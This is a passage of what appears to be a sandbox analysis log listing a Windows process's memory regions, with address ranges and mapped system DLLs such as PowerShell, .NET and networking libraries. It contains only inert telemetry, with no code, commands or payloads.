end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 655 start_va = 0x7fee61d0000 end_va = 0x7fee6268fff entry_point = 0x7fee61d0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 656 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 657 start_va = 0x1e00000 end_va = 0x1e00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 658 start_va = 0x2a10000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 659 start_va = 0x75470000 end_va = 0x75538fff entry_point = 0x75470000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll") Region: id = 660 start_va = 0x7fee2710000 end_va = 0x7fee30acfff entry_point = 0x7fee2710000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 661 start_va = 0x1e10000 end_va = 0x1e12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 662 start_va = 0x1e20000 end_va = 0x1e20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 663 start_va = 0x1fe0000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 664 start_va = 0x2030000 end_va = 0x203ffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 665 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 666 start_va = 0x2a90000 end_va = 0x2b90fff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 667 start_va = 0x2bd0000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 668 start_va = 0x2c50000 end_va = 0x1ac4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 669 start_va = 0x1ac50000 end_va = 0x1b31ffff entry_point = 0x0 region_type = private name = "private_0x000000001ac50000" filename = "" Region: id = 670 start_va = 0x1b340000 end_va = 0x1b3bffff entry_point = 0x0 region_type = private name = "private_0x000000001b340000" filename = "" Region: id = 671 start_va = 0x1b420000 end_va = 0x1b49ffff entry_point = 0x0 region_type = private name = "private_0x000000001b420000" filename = "" Region: id = 672 start_va = 0x7fee1830000 end_va = 0x7fee270bfff entry_point = 0x7fee1830000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll") Region: id = 673 start_va = 0x7ff00030000 end_va = 0x7ff0003ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00030000" filename = "" Region: id = 674 start_va = 0x7ff00040000 end_va = 0x7ff0004ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00040000" filename = "" Region: id = 675 start_va = 0x7ff00050000 end_va = 0x7ff000effff entry_point = 0x0 region_type = private name = "private_0x000007ff00050000" filename = "" Region: id = 676 start_va = 0x7ff000f0000 end_va = 0x7ff000fffff entry_point = 0x0 region_type = private name = "private_0x000007ff000f0000" filename = "" Region: id = 677 start_va = 0x7ff00100000 end_va = 0x7ff0016ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00100000" filename = "" Region: id = 678 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 679 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 680 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 689 start_va = 0x1e30000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 690 start_va = 0x1b4a0000 end_va = 0x1b781fff entry_point = 0x1b4a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 691 start_va = 0x7fee0c30000 end_va = 0x7fee0ce1fff entry_point = 0x7fee0c30000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll") Region: id = 692 start_va = 0x7fee0cf0000 end_va = 0x7fee1712fff entry_point = 0x7fee0cf0000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll") Region: id = 693 start_va = 0x7fffff00000 end_va = 0x7fffff0ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 694 start_va = 0x7fffff10000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 695 start_va = 0x7fee00d0000 end_va = 0x7fee0c2cfff entry_point = 0x7fee00d0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll") Region: id = 696 start_va = 0x7ff00170000 end_va = 0x7ff0017ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00170000" filename = "" Region: id = 697 start_va = 0x1f30000 end_va = 0x1f32fff entry_point = 0x1f30000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 698 start_va = 0x1b790000 end_va = 0x1b84ffff entry_point = 0x1b790000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 699 start_va = 0x77e00000 end_va = 0x77e06fff entry_point = 0x77e00000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 700 start_va = 0x1f40000 end_va = 0x1f40fff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 701 start_va = 0x1b850000 end_va = 0x1b94ffff entry_point = 0x0 region_type = private name = "private_0x000000001b850000" filename = "" Region: id = 702 start_va = 0x1fd0000 end_va = 0x1fd4fff entry_point = 0x1fd0000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 703 start_va = 0x2040000 end_va = 0x2080fff entry_point = 0x2040000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 704 start_va = 0x7ff00180000 end_va = 0x7ff0018ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00180000" filename = "" Region: id = 705 start_va = 0x2000000 end_va = 0x2007fff entry_point = 0x2000000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 706 start_va = 0x2010000 end_va = 0x2010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002010000" filename = "" Region: id = 707 start_va = 0x1e230000 end_va = 0x1e278fff entry_point = 0x1e230000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 708 start_va = 0x7fedfc00000 end_va = 0x7fedfce4fff entry_point = 0x7fedfc00000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll") Region: id = 709 start_va = 0x7fedfcf0000 end_va = 0x7fedfd99fff entry_point = 0x7fedfcf0000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll") Region: id = 710 start_va = 0x7fedfda0000 end_va = 0x7fee00cdfff entry_point = 0x7fedfda0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll") Region: id = 711 start_va = 0x7fee6190000 end_va = 0x7fee61c1fff entry_point = 0x7fee6190000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll") Region: id = 712 start_va = 0x7fef2fb0000 end_va = 0x7fef3018fff entry_point = 0x7fef2fb0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 713 start_va = 0x2020000 end_va = 0x2020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 714 start_va = 0x642ff4a0000 end_va = 0x642ff4a9fff entry_point = 0x642ff4a0000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 715 start_va = 0x7fedf8c0000 end_va = 0x7fedf9d7fff entry_point = 0x7fedf8c0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll") Region: id = 716 start_va = 0x7fedf9e0000 end_va = 0x7fedfbf5fff entry_point = 0x7fedf9e0000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll") Region: id = 717 start_va = 0x7fee6150000 end_va = 0x7fee618dfff entry_point = 0x7fee6150000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll") Region: id = 718 start_va = 0x29b0000 end_va = 0x2a03fff entry_point = 0x29b0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll") Region: id = 719 start_va = 0x7fedef00000 end_va = 0x7fedf094fff entry_point = 0x7fedef00000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll") Region: id = 720 start_va = 0x7fedf0a0000 end_va = 0x7fedf20bfff entry_point = 0x7fedf0a0000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll") Region: id = 721 start_va = 0x7fedf210000 end_va = 0x7fedf8b4fff entry_point = 0x7fedf210000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll") Region: id = 722 start_va = 0x7fef9350000 end_va = 0x7fef9356fff entry_point = 0x7fef9350000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 723 start_va = 0x2020000 end_va = 0x2020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 724 start_va = 0x27e0000 end_va = 0x27f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 725 start_va = 0x7feded70000 end_va = 0x7fedeef3fff entry_point = 0x7feded70000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 726 start_va = 0x7ff00190000 end_va = 0x7ff0019ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00190000" filename = "" Region: id = 727 start_va = 0x7ff001a0000 end_va = 0x7ff001affff entry_point = 0x0 region_type = private name = "private_0x000007ff001a0000" filename = "" Region: id = 728 start_va = 0x7ff001b0000 end_va = 0x7ff001bffff entry_point = 0x0 region_type = private name = "private_0x000007ff001b0000" filename = "" Region: id = 729 start_va = 0x7ff001c0000 end_va = 0x7ff001cffff entry_point = 0x0 region_type = private name = "private_0x000007ff001c0000" filename = "" Region: id = 730 start_va = 0x7ff001d0000 end_va = 0x7ff001dffff entry_point = 0x0 region_type = private name = "private_0x000007ff001d0000" filename = "" Region: id = 731 start_va = 0x7ff001e0000 end_va = 0x7ff001effff entry_point = 0x0 region_type = private name = "private_0x000007ff001e0000" filename = "" Region: id = 732 start_va = 0x7ff001f0000 end_va = 0x7ff001fffff entry_point = 0x0 region_type = private name = "private_0x000007ff001f0000" filename = "" Region: id = 733 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 734 start_va = 0x7ff00200000 end_va = 0x7ff0020ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00200000" filename = "" Region: id = 735 start_va = 0x7ff00210000 end_va = 0x7ff0021ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00210000" filename = "" Region: id = 736 start_va = 0x7ff00220000 end_va = 0x7ff0022ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00220000" filename = "" Region: id = 737 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 738 start_va = 0x1b950000 end_va = 0x1ba4ffff entry_point = 0x0 region_type = private name = "private_0x000000001b950000" filename = "" Region: id = 739 start_va = 0x2800000 end_va = 0x2800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 740 start_va = 0x1ba50000 end_va = 0x1bd4efff entry_point = 0x1ba50000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 741 start_va = 0x7fede520000 end_va = 0x7feded6afff entry_point = 0x7fede520000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll") Region: id = 742 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 743 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 744 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 745 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 746 start_va = 0x7ff00230000 end_va = 0x7ff0023ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00230000" filename = "" Region: id = 747 start_va = 0x7ff00240000 end_va = 0x7ff0024ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00240000" filename = "" Region: id = 748 start_va = 0x2810000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 749 start_va = 0x2820000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 750 start_va = 0x2ba0000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 751 start_va = 0x2bb0000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 752 start_va = 0x7ff00250000 end_va = 0x7ff0025ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00250000" filename = "" Region: id = 753 start_va = 0x7ff00260000 end_va = 0x7ff0026ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00260000" filename = "" Region: id = 754 start_va = 0x7ff00270000 end_va = 0x7ff0027ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00270000" filename = "" Region: id = 755 start_va = 0x1be50000 end_va = 0x1becffff entry_point = 0x0 region_type = private name = "private_0x000000001be50000" filename = "" Region: id = 756 start_va = 0x1bed0000 end_va = 0x1c85ffff entry_point = 0x0 region_type = private name = "private_0x000000001bed0000" filename = "" Region: id = 757 start_va = 0x7ff00280000 end_va = 0x7ff0028ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00280000" filename = "" Region: id = 758 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 759 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 760 start_va = 0x2bc0000 end_va = 0x2bc3fff entry_point = 0x2bc0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 761 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 762 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 763 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 764 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 765 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 766 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 767 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 768 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 769 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 770 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 771 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 772 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 773 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 774 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 775 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 776 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 777 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 778 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 779 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 780 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 781 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 782 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 783 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 784 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 785 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 786 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 787 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 788 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 789 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 790 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 791 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 792 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 793 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 794 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 795 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 796 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 797 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 798 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 799 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 800 start_va = 0x1c860000 end_va = 0x1c960fff entry_point = 0x0 region_type = private name = "private_0x000000001c860000" filename = "" Region: id = 801 start_va = 0x7fef8e50000 end_va = 0x7fef8e83fff entry_point = 0x7fef8e50000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 802 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 803 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 804 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 805 start_va = 0x1b320000 end_va = 0x1b320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001b320000" filename = "" Region: id = 844 start_va = 